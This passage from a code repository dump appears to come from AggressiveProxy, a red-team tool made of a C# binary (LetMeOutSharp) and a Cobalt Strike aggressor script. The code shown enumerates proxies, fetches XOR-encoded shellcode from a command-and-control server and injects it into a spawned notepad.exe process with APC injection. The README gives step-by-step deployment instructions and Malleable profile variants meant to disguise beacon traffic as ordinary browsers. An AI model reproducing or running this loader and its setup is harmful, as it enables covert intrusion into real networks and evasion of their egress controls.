your Malleable profile variant 53 | } 54 | else if (proxy.UserAgent.Equals(UserAgents.FFUA)) 55 | { 56 | variant = "firefox"; //This value should match with the value in AggressiveProxy.cna and your Malleable profile variant 57 | } 58 | string arch = "x64"; 59 | if (Utilities.Is64BitProcess.Equals("0")) 60 | { 61 | arch = "x86"; 62 | } 63 | Uri shellcodeUrl = new Uri(string.Format("{0}/{1}{2}{3}", C2.GetLeftPart(UriPartial.Authority), proxy.URLString.ToBase64(), variant.ToBase64(), arch.ToBase64())); 64 | #if DEBUG 65 | Console.WriteLine("Will request: {0}", shellcodeUrl); 66 | #endif 67 | string shresponse = Enumerator.GetHTTP(shellcodeUrl, proxy); 68 | #if DEBUG 69 | Console.WriteLine("Shellcode length: {0}", shresponse.Length); 70 | #endif 71 | byte[] values = shresponse.ConvertHexStringToByteArray(); 72 | 73 | for (int i = 0; i < values.Length; i++) 74 | { 75 | values[i] = (byte)(values[i] ^ 0x2a); // If XOR keys gets changed in the AggressorScript, make sure to change it here as well 76 | } 77 | new ApcInjectionNewProcess(values); 78 | break; 79 | } 80 | } 81 | catch (Exception ex) 82 | { 83 | #if DEBUG 84 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 85 | #endif 86 | } 87 | } 88 | #if DEBUG 89 | Console.WriteLine("Finish..."); 90 | #endif 91 | } 92 | } 93 | } 94 | } -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | 4 | // Information about this assembly is defined by the following attributes. 5 | // Change them to the values specific to your project. 6 | 7 | [assembly: AssemblyTitle("")] 8 | [assembly: AssemblyDescription("")] 9 | [assembly: AssemblyConfiguration("")] 10 | [assembly: AssemblyCompany("")] 11 | [assembly: AssemblyProduct("")] 12 | [assembly: AssemblyCopyright("")] 13 | [assembly: AssemblyTrademark("")] 14 | [assembly: AssemblyCulture("")] 15 | 16 | // The assembly version has the format "{Major}.{Minor}.{Build}.{Revision}". 17 | // The form "{Major}.{Minor}.*" will automatically update the build and revision, 18 | // and "{Major}.{Minor}.{Build}.*" will update just the revision. 19 | 20 | [assembly: AssemblyVersion("1.0.*")] 21 | 22 | // The following attributes are used to specify the signing key for the assembly, 23 | // if desired. See the Mono documentation for more information about signing. 24 | 25 | //[assembly: AssemblyDelaySign(false)] 26 | //[assembly: AssemblyKeyFile("")] 27 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Utilities.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Globalization; 3 | using System.Text; 4 | 5 | namespace LetMeOutSharp 6 | { 7 | public static class Utilities 8 | { 9 | //Am I a 64 or 32-bit process? 10 | public static string Is64BitProcess 11 | { 12 | get { return IntPtr.Size == 8 ? "1" : "0"; } 13 | } 14 | 15 | public static Uri ToUri(this string str) 16 | { 17 | Uri url = new System.Net.WebProxy(str).Address; 18 | return url; 19 | } 20 | 21 | public static string ToBase64(this string str) 22 | { 23 | return Convert.ToBase64String(Encoding.ASCII.GetBytes(str)); 24 | } 25 | 26 | public static byte[] ConvertHexStringToByteArray(this string hexString) 27 | { 28 | if (hexString.Length % 2 != 0) 29 | { 30 | throw new ArgumentException(String.Format(CultureInfo.InvariantCulture, 31 | "The binary key cannot have an odd number of digits: {0}", hexString)); 32 | } 33 | 34 | byte[] data = new byte[hexString.Length / 2]; 35 | for (int index = 0; index < data.Length; index++) 36 | { 37 | string byteValue = hexString.Substring(index * 2, 2); 38 | data[index] = Byte.Parse(byteValue, NumberStyles.HexNumber, 39 | CultureInfo.InvariantCulture); 40 | } 41 | 42 | return data; 43 | } 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AggressiveProxy 2 | AggressiveProxy is a combination of a .NET 3.5 binary (**LetMeOutSharp**) and a Cobalt Strike aggressor script (**AggressiveProxy.cna**). Once LetMeOutSharp is executed on a workstation, it will try to enumerate all available proxy configurations and try to communicate with the Cobalt Strike server over HTTP(s) using the identified proxy configurations. 3 | 4 | The story behind the tool can be found at [EncodeGroup's Medium](https://medium.com/encode-threat-labs/aggressiveproxy-a-tale-of-two-proxies-and-a-sad-beacon-43042a04a0d0) 5 | 6 | ## Requirements 7 | * CobaltStrike 4.1 8 | * Mono Framework 9 | 10 | ## Instructions 11 | * Modify the `$msbuild` value in AggressiveProxy.cna to point to the path of msbuild executable which is part of the Mono Framework 12 | * Click on the *Proxy Handler->Start Handler* menu item. At this point the script will request the listener, the proxy handler URL and the expected response content settings. 13 | * Once these values have been set, the script will then: 14 | * Replace `%C2URL%` and `%RESPONSE%` placeholders inside `Program_template.cs` and create the `Program.cs` file 15 | * Invoke MSBuild in order to build the .NET binary LetMeOutSharp 16 | * The script will then create a web page at the provided `Check URL`. Once a hit has been made to the specific URL from LetMeOutSharp, it will then: 17 | * Try to decode the base64 parameters of the GET request and extract the proxy address:port, the UserAgent and the architecture (x86/x64). 18 | * Try to match the UserAgent it received and pick a proper Malleable variant. If you want the generated shellcode to use the appropriate User-Agent, you will need to create the following variants: 19 | * "chrome" 20 | * "firefox" 21 | * "edge" 22 | 23 | If there are no variants configured, the default one should be used. The new variants should have **exactly the same configuration** as the variant your listener is/will be using, with the addition of the appropriate `header "User-Agent"` line in the `client` part. 24 | For example if your listener is using the following profile: 25 | ``` 26 | http-get { 27 | set uri "/test/"; 28 | set verb "GET"; 29 | client { 30 | header "Accept" "*/*"; 31 | header "Accept-Encoding" "gzip, deflate"; 32 | metadata { 33 | base64url; 34 | prepend "user="; 35 | header "Cookie"; 36 | } 37 | } 38 | server { 39 | header "Server" "Server"; 40 | header "Content-Type" "application/text"; 41 | header "Connection" "keep-alive"; 42 | output { 43 | print; 44 | } 45 | } 46 | } 47 | ``` 48 | You will need to define the following variants: 49 | ``` 50 | http-get "chrome" { 51 | .... 52 | client { 53 | .... 54 | header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"; 55 | .... 56 | } 57 | server { 58 | .... 59 | } 60 | } 61 | http-get "firefox" { 62 | .... 63 | client { 64 | .... 65 | header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"; 66 | .... 67 | } 68 | server { 69 | .... 70 | } 71 | } 72 | http-get "edge" { 73 | .... 74 | client { 75 | .... 76 | header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51"; 77 | .... 78 | } 79 | server { 80 | .... 81 | } 82 | } 83 | ``` 84 | 85 | * AggressiveProxy.cna will then setup a new temporary listener with the custom proxy configuration. The following exception will be logged: `java.lang.RuntimeException: Another Beacon listener exists on your cobalt console`. This is normal and we will be using the temporary listener in order to create the shellcode with the custom proxy configuration. After generating the shellcode, the listener will be deleted. 86 | * A new URL will be created which will host the shellcode which is XOR encrypted and in HEX form. 87 | * LetMeOutSharp, will then fetch the shellcode and try to inject it to a new process. Currently as a POC, LetMeOutSharp will perform a QueueUserAPC injection to a newly spawned process of our favorite process `notepad.exe`. Feel free to modify `Injector.cs` to your taste. 88 | 89 | ## Menu options 90 | The CNA will create a menu with the following items: 91 | * *Start Handler* is responsible for defining the listener that LetMeOutSharp will try to communicate to, the URL that will try to reach as well as the expected response from the web server. After defining the settings, it will host the proxy handling URL on the Cobalt Strike web server. 92 | * *Stop Handler* will remove the proxy handling URL and any hosted generated shellcodes. 93 | 94 | ## Extra Configuration 95 | 96 | * By modifying `$buildver` variable in the AggressiveProxy CNA, you can build a Debug version of LetMeOutSharp, which is more verbose and will print out all the relevant information it gathers. This should be used only for testing purposes. 97 | * Currently, AggressiveProxy CNA is using unpenetratable encryption for the hosted shellcode, with the use of a hardcoded XOR key. This can be modified the `$xordata` variable. You should also replace the line `values[i] = (byte)(values[i] ^ 0x2a);` in Program_template.cs 98 | 99 | ## Notes 100 | An effort has been made to test multiple cases of proxy configurations / technologies. This however does not mean that all cases have been accounted for. If you feel you have found a case, where LetMeOutSharp does not take into account, feel free to open an issue or a merge request. 101 | 102 | ## Authors 103 | 104 | [@cirrusj](https://github.com/cirrusj) 105 | 106 | [@leftp](https://github.com/leftp) 107 | --------------------------------------------------------------------------------